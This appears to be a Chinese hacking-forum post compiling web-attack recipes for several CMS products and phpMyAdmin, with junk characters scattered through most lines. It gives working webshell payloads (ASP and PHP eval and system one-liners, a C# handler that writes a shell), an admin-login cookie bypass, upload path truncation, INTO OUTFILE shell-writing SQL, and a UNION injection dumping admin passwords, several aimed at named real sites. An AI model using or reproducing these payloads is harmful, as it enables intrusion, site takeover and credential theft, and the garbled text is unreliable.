<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">6 Q2 _& q) `) t2 r/ k
Upload a new file:<br>+ o6 J, W. [* x6 s* q: O% y
<input type="file" name="NewFile" size="50"><br>
' q3 W6 h: g( S9 z0 |' j/ A<input id="btnUpload" type="submit" value="Upload">
) i. A% H# Z ]* W: a</form>
) N1 V' F2 i# x. R5 l% Z-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 e! O: ^) [; O$ `4 Q8 q& f, R
1 r4 z6 ~) s9 M8 S: Q' nSDcms 后台拿webshell" x3 @: u4 i/ l5 f+ B( X8 H$ ]
/ V0 p7 v- X5 Z/ Q6 e
第一种方法:0 H, B* B+ ]1 u/ l
进入后台-->系统管理-->系统设置-->系统设置->网站名称;* ]! U o% ?6 H+ a2 q
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
* `% w5 v# e* z/ u用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
2 F1 t; U" C) A, ^: P% r第二种方法:
|/ h8 U8 J6 ]; T% E, @! G ~进入后台-->系统管理-->系统设置-->系统设置->上传设置;
" [+ Y& U b$ E# y+ T2 n o% w在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!& w: Z/ _ s/ V
第三种方法:2 T E* Y( d( `* N9 T1 s; r3 k G
进入后台-->界面管理-->模板文件管理-->创建文件
4 k/ F) q2 I9 B' P文件名写入getshell.ashx
& ~! q m2 L6 i. d8 l# {内容写入下面内容:) _, W- e+ F* t$ G
/====================复制下面的=========================/6 J+ a# ]& N8 W( o
<%@ WebHandler Language="C#" Class="Handler" %>
. g& r- `% T5 {) {5 C/ o2 Eusing System;
: Q# y# [* y3 M* h5 E6 Cusing System.Web;* Y; w, S4 `& {* _0 l. R
using System.IO;
, C: ^- h/ H6 i" E! A+ p3 w5 t, fpublic class Handler : IHttpHandler {
; K+ S7 r# ]" b$ j# U J5 ?( Gpublic void ProcessRequest (HttpContext context) {
5 _/ K( V6 B; X ^+ p1 [context.Response.ContentType = "text/plain";
, t6 r' P' P2 sStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));5 j* u0 Q* {( T) `) m
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
# {5 Y& y( H# N0 `& {* |* qfile1.Flush();
1 a6 g0 X5 f& S4 Wfile1.Close();
6 U8 O; R8 L& J# Y- s}- B9 m5 A0 i- ?( O. g" j4 R
public bool IsReusable {
3 U) y! b% u& u% H3 dget {
1 @5 d* C- U! k/ Yreturn false;0 q) {, }* y8 H) A! ]) j! [
}" K( ~* v8 u4 D4 y7 Y+ F
}
4 g8 Y( ^9 b g* J}' s; M. k, f# v5 ]; e
/=============================================/$ E7 f+ ]* G$ L% x7 l
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx, v& z& z% h9 M: ?7 K
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接# U# B( C' e' B" T( @( a4 \& e" C& d7 ~
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ P3 ? V& q9 f
$ u# @2 J* L' y( i+ ?) E4 ZESCMS网站管理系统0day3 E/ d0 R. g1 y7 B. M, A" R# }; j1 ^
6 V- K7 L* q3 \, e2 Y后台登陆验证是通过admin/check.asp实现的
8 ^- F# f8 i& ?5 \6 c/ \
% U6 K9 r1 J+ ~9 X3 M7 n% @% a首先我们打开http://target.com/admin/es_index.html
" I3 F8 F8 T/ M7 Z+ i然后在COOKIE结尾加上
" j* X; q" \6 ~1 _" l- M; ESCMS$_SP2=ES_admin=st0p;2 b0 o# H. ]$ e) l4 w6 t7 C
修改,然后刷新8 H- l7 E. a M; j+ t- J, Z, F) h
进后台了嘎..$ u: V) I- W8 b# b& f- W
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL& Y- Q) \9 b7 T# P$ X$ b
4 z1 S6 t/ D5 K2 a9 T( Y/ h4 R利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
0 M* `, I* u2 h2 }/ i嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp) p0 ~4 `. e$ t' M: i& g
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..8 A( R2 k/ G: m/ y
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了$ y/ R3 H: V. Z2 T) \2 I+ h
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; @9 J5 M" T1 @1 J
4 [ C6 a( b$ e& D4 [宁志网站管理系统后台无验证漏洞及修复
* n2 K i' G6 s/ { G! U7 s1 Y2 L1 _4 p# i! j' x: M
网上搜了一下,好像没有发布.如有雷同纯粹巧合!* d6 K" \- {" x9 A q$ V
官方网站:www.ningzhi.net
: M/ t6 e0 S. d$ U, A1 P" o学校网站管理系统 V.2011版本 6 ~4 f/ f- N" C1 ~* B
http://down.chinaz.com/soft/29943.htm & \+ L) X q' e) ?6 D
其它版本(如:政府版等),自行下载.
, ]3 u1 F6 G& [漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~" U5 j( Z& G7 P& I$ R' \: A
login.asp代码如下:: A6 I5 R/ z) U/ T! c& B
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> 6 e$ b/ e# z& M( y
manage.asp代码我就不帖出来了.反正也没验证.& o$ t+ i: P J! Q, @% D% S- x
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!0 V0 U9 n' M1 u) t0 G. ~
漏洞利用:
5 l* ~3 `1 a1 s- e4 ]; l直接访问http://www.0855.tv/admin/manage.asp
" t" k8 y5 Y# W+ ]$ n5 Y" Z: U0 r数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
# D& J% g5 U y( l+ T/ a----------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 r3 v% Z; s5 g9 j5 w7 b
6 q' ~' @! V) P8 w- \phpmyadmin拿shell的四种方法总结及修复8 ]: N: ^5 Q% H& [7 N8 ]! B
" y; Q: V+ a: D O方法一:
`7 `* \) D% U1 WCREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );9 ~' I u$ ~# R2 y2 [( q
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
4 Y7 s. P2 ^* rSELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
+ h9 z6 U% I4 ?3 Z# b4 ~----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php" y* O9 q! o$ A
一句话连接密码:7on" v4 _7 v: _* B% k
方法二:! ~) R4 v+ l1 I3 D. C: I/ J4 u
读取文件内容: select load_file('E:/xamp/www/s.php');
3 n! ]4 v8 `4 R; Z写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'4 C; @+ j/ V% Q: ~- m- Z4 i0 I
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'5 a. D$ g; m+ Q4 |/ D6 [
方法三:
$ a" t$ q% W6 R& P- tJhackJ版本 PHPmyadmin拿shell
+ ~5 q/ g2 W! t; g& ]Create TABLE study (cmd text NOT NULL);: } }# g% q6 s- i; a/ t, l) h# L
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');2 b" ~# }1 F L2 r/ o& x$ D
select cmd from study into outfile 'E:/wamp/www/7.php';
( s; z6 A4 \; |0 _' ZDrop TABLE IF EXISTS study;
8 [' {$ P4 v5 F8 ]% t( j; P7 H<?php eval($_POST[cmd])?>8 V: f3 h2 f5 O# S( I$ T8 d$ b% m
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。, T+ L, \" d3 ^
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1: ]& m3 O& \- o( t, r
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1' O, l: A. j( o( @
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
8 J2 N+ j7 Y3 |# q1 F, `- X- Q/ E# ~方法四:+ z; K) _. H7 J; o4 R
select load_file('E:/xamp/www/study.php');" q& k$ N# D# g# r- i W
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
9 a5 Q* S( U$ B) Y然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
, I! N" M8 U; l+ m) Y-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ i% }- I) ~& K3 R$ g8 `8 c
, b* h5 F- C9 R% r; ]8 MNO.001中学网站管理系统 Build 110628 注入漏洞9 ]2 ~: R) B; s' t4 w. P
* P5 M( N& q2 s6 J S. {) c. yNO.001中学网站管理系统功能模块:
+ a0 `' {2 S4 \ z1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等- Z* @1 y9 [2 \. V" [, V
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
& [. z! i' S C. f* Y* ]3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
4 L6 D/ H+ S2 y+ y" S4.视频图片管理:一级分类,动态添加视频或者图片等信息
' o7 @& g& p; @5.留言管理:对留言,修改,删除、回复等管理
% H; a/ W4 p# K. g: J' B- I8 @3 }6.校友频道:包括校友资料excel导出、管理等功能
2 H: i3 o* K2 z( o# ^7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
& W& i/ h/ b8 J' {8 d默认后台:admin/login.asp
# p, z; ~7 T& k+ {: U官方演示:http://demo.001cms.net
! B/ V5 J) r9 c( [: r源码下载地址:http://down.chinaz.com/soft/30187.htm+ m- y4 o5 F1 D7 y9 M% w% S
EXP:5 x- d/ |0 h, B P1 Z
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
- H {1 L% p w+ H测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
) r$ F2 E5 E/ Qgetshell:后台有备份,你懂的" H& Q( o l7 N" s& F) U( A' O2 H
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
( }- Y5 \+ v' h8 p------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
匿名
发表于 2017-10-28 08:21:04
发表于 2012-9-13 16:58:38
收藏
支持
反对